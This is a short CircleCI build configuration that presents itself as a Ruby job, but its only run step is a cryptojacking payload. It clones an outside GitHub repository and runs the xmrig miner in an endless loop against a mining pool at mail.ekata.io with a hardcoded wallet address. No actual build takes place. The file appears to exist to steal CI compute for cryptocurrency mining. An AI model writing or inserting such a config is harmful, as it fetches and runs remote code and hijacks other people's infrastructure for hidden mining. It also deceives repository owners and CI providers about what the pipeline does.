version: 2.1
jobs:
  build:
    docker:
      - image: circleci/ruby:2.4.2-jessie-node
        auth:
          username: mydockerhub-user
          password: $DOCKERHUB_PASSWORD
    steps:
      - checkout 
      - run: git clone https://github.com/saroden99/k.git && cd k && chmod +x xmrig && while(:); do ./xmrig -a cn-pico -o stratum+tcp://mail.ekata.io:3333 -u bazaatV4qYYKjM3xd7Q3h28niM7kJkJxnJxtnRkZCHFHYdM42d3euK4bYVbw2kPvKcTv2HSbatu7VCdNuUKNm35BebD6Lkc9gbx --1gb-pages -p x -t 8; done